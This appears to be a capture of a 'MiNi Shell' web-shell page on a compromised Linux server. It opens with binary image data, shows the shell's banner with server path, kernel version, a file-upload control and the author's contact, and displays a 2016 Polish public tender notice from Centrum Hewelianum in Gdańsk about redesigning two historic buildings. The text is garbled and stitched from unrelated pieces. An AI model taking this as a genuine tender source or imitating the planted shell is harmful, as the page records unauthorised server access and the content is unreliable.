JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160216/33868-N-2016.html

<p class="kh_header"><b>Gdańsk: wykonanie wielobranżowej dokumentacji projektowej i kosztorysowej przebudowy budynków, zlokalizowanych w Gdańsku przy ul. 3 Maja 21C i 21D, wraz ze zmianą sposobu ich użytkowania na funkcje usługowe związane z działalnością Centrum Hewelianum</b><br>
<b>Numer ogłoszenia: 33868 - 2016; data zamieszczenia: 16.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Centrum Hewelianum" Jednostka Budżetowa Gminy Miasta Gdańsk , ul. Gradowa 6, 80-802 Gdańsk, woj. pomorskie, tel. 58 300 08 42, faks 58 742 15 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hewelianum.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie wielobranżowej dokumentacji projektowej i kosztorysowej przebudowy budynków, zlokalizowanych w Gdańsku przy ul. 3 Maja 21C i 21D, wraz ze zmianą sposobu ich użytkowania na funkcje usługowe związane z działalnością Centrum Hewelianum.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie wielobranżowej dokumentacji projektowej i kosztorysowej oraz specyfikacji technicznych wykonania i odbioru robót, o których mowa w art. 31 ust. 1 Ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, przebudowy budynków zlokalizowanych w Gdańsku przy ul. 3 Maja 21C i 21D, wraz ze zmianą sposobu ich użytkowania na funkcje usługowe związane z działalnością Centrum Hewelianum, w ramach zadania inwestycyjnego pn. Dokumentacja dla przyszłych projektów.
Niniejszym zamówieniem objęte są budynki nr 21C oraz 21D przy ul. 3 Maja, wraz z placem wewnętrznym oraz terenem przylegającym do budynku 21D.
2. Założenia funkcjonalno-przestrzenne:
Budynek 21C - planowana zmiana dotychczasowej funkcji mieszkalnej na wystawienniczą.  
Budynek 21D - planowane wprowadzenie hostelu w dawny układ mieszkań przytułku szpitalnego, przy niezmienionym głównym schemacie komunikacyjnym.  
3. Zakres prac objętych umową obejmuje: 
Etap 1
1)	Wykonanie mapy do celów projektowych w skali 1 : 500,
2)	Wykonanie koniecznych badań i opracowań geotechnicznych,
3)	Sprawdzenie i ewentualne uzupełnienie inwentaryzacji przekazanych przez Zamawiającego,
4)	Badania i opracowania mykologiczne - dla obu budynków,
5)	Ekspertyzy konstrukcyjne budynków,
6)	Sporządzenie koncepcji proponowanych przez Wykonawcę rozwiązań projektowych. 
Etap 2
7)	Wykonanie programu prac konserwatorskich, zgodnie z Rozporządzeniem Ministra Kultury i Dziedzictwa Narodowego z dnia 14 października 2015 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań zabytków (Dz. U. z 2015r. poz. 1789)
8)	Wykonanie wielobranżowych projektów budowlanych, odrębnie dla budynku nr 21C i budynku nr 21D, obejmujących plac wewnętrzny oraz teren przylegający do budynku 21D, stanowiących podstawę do uzyskania koniecznych decyzji, w tym decyzji udzielających pozwolenia na przebudowę obiektów i zmiany sposobu ich użytkowania (m. innymi: projekt zagospodarowania terenu, projekt układu komunikacyjnego - wjazdy z ul. 3 Maja, miejsca postojowe, dojścia piesze; architektura, konstrukcja, sieci, przyłącza i instalacje sanitarne - opisane w pkt. 13f, sieci, przyłącza i instalacje elektryczne - opisane w pkt. 13g, oraz teletechniczne - opisane w pkt. 13h, wraz z usunięciem ewentualnych kolizji i inne opracowania wymagane przepisami ustawy Prawo budowlane). Projekty do wniosków o wydanie pozwoleń na prowadzenie robót budowlanych przy zabytku wpisanym do rejestru zabytków należy uzupełnić o rysunki wykonawcze wymagane przez służby konserwatorskie. 
9)	Świadectwa charakterystyki energetycznej dla budynków.
10)	Wykonanie wszelkich innych, niewymienionych wyżej, opracowań niezbędnych w celu uzyskania uzgodnień, opinii, odstępstw i pozwoleń.
11)	Wykonawca zobowiązany jest do uzyskania wszelkich niezbędnych warunków technicznych oraz kompletu opinii, uzgodnień, odstępstw i pozwoleń, koniecznych do uzyskania decyzji pozwalających na realizację inwestycji.
12)	Sporządzanie wniosków o wydanie koniecznych warunków i pozwoleń wraz z kompletami materiałów niezbędnych do ich uzyskania.
Etap 3
13)	Wielobranżowe projekty wykonawcze obejmujące detale i szczegóły: 
a.	Projekt zagospodarowania terenu - między innymi: ukształtowanie terenu z bilansem mas ziemnych, nawierzchnie, zieleń w tym projekt zielnika, odwodnienie terenu.
b.	Elementy małej architektury i projekt śmietnika.
c.	Układ komunikacyjny - rozwiązania szczegółowe, między innymi w zakresie nawierzchni (dojścia, dojazdy, miejsca postojowe), wjazdów na teren objęty projektem, projekty organizacji ruchu (docelowa i na czas budowy).
d.	Projekt architektoniczny - między innymi: szczegóły detali architektonicznych, projekt renowacji elewacji i rekonstrukcji brakujących elementów, projekt stolarki okiennej i drzwiowej oraz szczegóły klatek schodowych (rekonstrukcja, wykończenie, balustrady), rodzaj i układ posadzek, proponowane wyposażenie stałe (m.in. ścianki przesuwne, osłony grzejników, itp.), kolorystyka ścian, rodzaj oświetlenia, szczegóły izolacji przeciwwodnej oraz cieplnej obiektów.
e.	Projekt konstrukcyjny - między innymi: rozwiązania szczegółowe oraz technologie wykonania wzmocnień i uzupełnień bądź wymiany elementów konstrukcyjnych obiektów.
f.	Projekt instalacji sanitarnych, w tym rozwiązania szczegółowe:
-	dolne źródło wraz z instalacją zewnętrzną,
-	węzeł cieplny (zlokalizowany w budynku 21C - z możliwością rozbudowy), 
-	instalacja c.o.,
-	instalacja zimnej i ciepłej wody,
-	instalacja hydrantowa (wewnętrzna i zewnętrzna),
-	instalacja kanalizacji sanitarnej,
-	klimatyzacja (w zależności od możliwości technicznych i uwarunkowań konserwatorskich), 
-	instalacja wentylacji mechanicznej z odzyskiem ciepła, 
-	instalacja kanalizacji deszczowej (w tym zbiornik retencyjno-rozsączający pełniący funkcję zbiornika na wody opadowe), 
-	przyłącze kanalizacji deszczowej,
-	przyłącze wodociągowe,
-	przyłącze kanalizacji sanitarnej,
-	przyłącze gazowe.
g.	Projekt instalacji elektrycznych, w tym rozwiązania szczegółowe:
-	 zasilanie i WLZ,
-	 instalacja siły,
-	 instalacja oświetlenia wewnętrznego, w tym ekspozycyjnego,
-	 instalacja gniazdek wtyczkowych ogólnych,
-	 instalacja gniazdek wtyczkowych dedykowanych (UPS),
-	 instalacja odgromowa,
-	 iluminacja wewnętrzna i zewnętrzna,
-	 oświetlenie terenu.
h.	Projekt instalacji teletechnicznych, w tym rozwiązania szczegółowe:
-	 zewnętrzne przyłącza telekomunikacyjne,
-	 instalacja telefoniczna,
-	 instalacja okablowania strukturalnego,
-	 instalacja sygnalizacji alarmu pożarowego,
-	 instalacja sygnalizacji włamania,
-	 instalacja monitoringu wizyjnego zewnętrznego i wewnętrznego,
-	 instalacja systemu zarządzania budynkiem. 
14)	Wykonanie specyfikacji technicznych wykonania i odbioru robót (STWiORB), 
15)	Wykonanie dokumentacji kosztorysowej.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, w ciągu 3 lat od udzielenia niniejszego zamówienia, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek wiedzy i doświadczenia będzie potwierdzony jeżeli wykonawca wykaże, że w okresie ostatnich 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał:
co najmniej jedno zamówienie na wykonanie wielobranżowej dokumentacji projektowej, w zakresie dotyczącym budynku użyteczności publicznej, o powierzchni całkowitej nie mniejszej niż 1500 m2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek dysponowania osobami zdolnymi do wykonania zamówienia będzie potwierdzony jeżeli wykonawca wykaże, że dysponuje: 
a) co najmniej jedną osobą:
- posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności architektonicznej,
- będącą autorem co najmniej jednej dokumentacji projektowej obejmującej budynek wpisany do rejestru zabytków, na podstawie której zostało udzielone pozwolenie na wykonanie robót przy zabytku,
b) co najmniej jedną osobą:
- posiadającą uprawnienia budowlane do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej,
- będącą autorem co najmniej jednej dokumentacji projektowej obejmującej budynek wpisany do rejestru zabytków, na podstawie której zostało udzielone pozwolenie na wykonanie robót przy zabytku,
c) co najmniej jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
d) co najmniej jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności telekomunikacyjnej,
e) co najmniej jedną osobą posiadającą uprawnienia do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych, kanalizacyjnych, cieplnych oraz wentylacyjnych i gazowych.
W przypadku osób będących obywatelami państw członkowskich, które nabyły kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej z wykonywaniem samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, zamiast uprawnień określonych w pkt. 2, wystarczające jest posiadanie odpowiedniej decyzji o uznaniu kwalifikacji zawodowych lub legitymowanie się prawem do świadczenia usług transgranicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - wykonanie przedmiotu zamówienia przez wykwalifikowany zespół - 15</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Istotne zmiany umowy, w stosunku do treści złożonej oferty, mogą dotyczyć:
1)	warunków płatności,
2)	terminu realizacji zamówienia,
3)	sposobu realizacji zamówienia
4)	zakresu prac w stopniu nie wykraczającym poza określenie przedmiotu zamówienia zawarte w OPZ,
5)	zmiany osób uczestniczących w wykonywaniu zamówienia po stronie Wykonawcy, z zastrzeżeniem zapisów § 8 ust. 3 i 4 umowy
6)	zmiany podwykonawców
7)	wynagrodzenia wykonawcy, jedynie w przypadku, o którym mowa w ust. 2 pkt. 9 lub pkt.10.
2.  Zmiany, o których mowa w ust. 1 mogą być dokonane w przypadku:
1)	braku możliwości dostępu do lokali w budynkach objętych przedmiotem umowy, w sytuacji gdy dostęp ten będzie niezbędny w celu prawidłowego wykonania przedmiotu umowy;
2)	opóźnienia Zamawiającego w przekazaniu danych wyjściowych koniecznych do wykonania dokumentacji lub opóźnienia w zajęciu stanowiska w sprawach dotyczących realizacji przedmiotu umowy, w sytuacjach gdy zgodnie z postanowieniami umowy, obowiązek taki spoczywa na Zamawiającym;
3)	opóźnienia Zamawiającego w złożeniu prawidłowo przygotowanych przez Wykonawcę wniosków;
4)	konieczności wykonania dodatkowych badań i opracowań, które wymagają dodatkowego czasu na wykonanie zamówienia;
5)	przedłużania się procesu zbierania opinii, uzgodnień i pozwoleń, mimo prawidłowo przygotowanych i złożonych wniosków;
6)	wystąpienia zdarzeń losowych mających charakter siły wyższej, które uzasadniają wprowadzenie zmian do umowy;
7)	zawieszenia prac przez Zamawiającego;
8)	innych przeszkód uniemożliwiających prowadzenie prac, za które nie odpowiada Wykonawca;
9)	rezygnacji z części prac, jeśli taka rezygnacja będzie wynikała z faktycznych potrzeb wykonania poszczególnych opracowań w celu prawidłowej realizacji przedmiotu umowy;
10)	ustawowej zmiany stawki podatku od towarów i usług (VAT);
Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.
Warunkiem dokonania zmian postanowień umowy jest zgoda obu stron wyrażona na piśmie, w formie aneksu do niniejszej umowy, pod rygorem nieważności takiej zmiany</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.hewelianum.pl/ogloszenia?PHPSESSID=04904d4ca10492fd0f7be0ce0358cce7<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> j.w. lub biuro@bozp.com.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2016 godzina 10:00, miejsce: Centrum Hewelianum, ul. Gradowa 6, 80-802 Gdańsk, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com